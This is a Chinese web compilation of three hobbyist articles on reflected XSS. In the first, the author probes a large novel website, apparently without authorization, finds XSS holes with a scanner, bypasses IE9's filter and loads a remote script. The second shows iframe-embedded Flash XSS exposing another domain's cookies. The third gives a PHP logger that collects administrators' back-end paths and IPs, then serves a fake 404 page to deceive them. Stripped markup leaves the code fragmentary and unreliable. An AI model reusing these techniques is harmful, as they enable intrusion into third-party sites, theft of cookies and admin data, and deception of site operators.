鸡肋的反射性xss脚本安全

2024-04-15

鸡肋的反射性xss脚本安全(共3篇)

篇1:鸡肋的反射性xss脚本安全

0x00起因

最近在一个比较大的小说网站上发现有注入漏洞,今天就一直想办法注入,结果一直也没有注进去,其主要原因就是只要我输入select他就会弹出对话框,如下图所示:

考虑了好久也没有想出什么好办法(只有留着),但是看着这个对话框总让人想到xss的场景,既然什么东西都那么容易就弹出来了,应该也会存在漏洞吧,于是就拿Acunetix一扫,果然发现了一大堆的xss漏洞(不过工具扫出来的也一般都是反射性的了):

看来现在虽然xss漏洞已经被owasp排在了web各大漏洞前列,但是实际好像不怎么受到重视哈。也跟xss大部分比较鸡肋有关吧,比如说本文发现的。

0x01 操作

Acunetix是一个很强大的扫描工具,能精确的发现大多数web漏洞,搞到工具那就是大家自己的事情了,呵呵。

首先选择一个xss漏洞点:右击 edit with http editor:

在这里他已经发现了代码的注入点,你只需要在固定的地方自定义的注入自己的代码,比如:

alert(/xss/)可以先在notepad上面编辑好了之后再访问,如图:由于我用的IE9,IE有自己的xss的过滤器,所以我说这个漏洞鸡肋,不过对低版本的很有效的,不会很多人都用IE9吧,为了达到测试效果,我们可以先关了xss过滤器。效果如下:一般反射性的xss都不会有字数限制的,所以你可以直接写payload,也可以远程加载,为了用到以前的测试代码我就远程加载试试。准备好的远程文件:j1.js效果:后面利用的手法就看大家的理解了。0x 02 总结反射性xss的原理和存储型xss有些差别,其差别在于存储型xss的注入代码在服务器上,相对的来说危害较大一些,反射性必须需要点击url这个就是比较难利用的主要原因。本文中说的鸡肋不是说反射性xss,而是对于现在最新的浏览器来说,远没有sql注入来的直接,但是,在真正的高手,xss也会是很可怕的,文章没有什么技术,只是菜鸟上次写了一篇存储型的,这篇作为补充。(大牛勿喷)​

篇2:鸡肋的反射性xss脚本安全

----------------------------------------------------

在本地localhost建一个页面,进行了以下测试。

通过iframe调用传统的反射型XSS,因为iframe页面不同域,被IE9过滤器过滤掉,不执行。

如果用普通的embed来嵌入FLASH的话,则弹出的是localhost,即当前测试网页的cookies

IE下测试:chrome会崩溃.www.xxx.com

 

但是用iframe来嵌入FLASHXSS的话,就有意思了

测试代码如下(IE):

在chrome中,可能会导致浏览器崩溃,可以改用以下代码,

运行你会发现,弹出的是新浪域的cookies~

------------------------------------------

因此当我们发现www.A.com域名下的一个flashXSS

我们可以在www.B.com域名下用iframe嵌入www.A.com的flashXSS文件。

篇3:xss获取后台路径脚本安全

$cun=“URL:”.$_GET[“admin_name”].“--ip:”.$HTTP_SERVER_VARS[“REMOTE_ADDR”].“--”.date(“Y-m-d H:i:s”).“ ”;

fwrite(fopen(“CUN.txt”,“ab”),$cun);

?>

用于XSS的代码

“/>

上面的的能够对付很多存在XSS的地方,这个XSS代码存在的缺点就是管理员后台打开直接就会跳到你接收后台地址的PHP地址页,所以为了迷惑管理员,在PHP最下面加上代码如下:

无法找到该页

无法找到该页

您正在搜索的页面可能已经删除、更名或暂时不可用,

xss获取后台路径脚本安全

请尝试以下操作:

确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。

如果通过单击链接而到达了该网页,请与网站管理员联系,通知他们该链接的格式不正确。

单击后退按钮尝试另一个链接。

HTTP 错误 404 - 文件或目录未找到。

Internet 信息服务 (IIS)

技术信息(为技术支持人员提供)

转到 Microsoft 产品支持服务并搜索包括“HTTP” 和“404”的标题。

上一篇:新生代农民工生存状况调查报告下一篇:星怅小学作文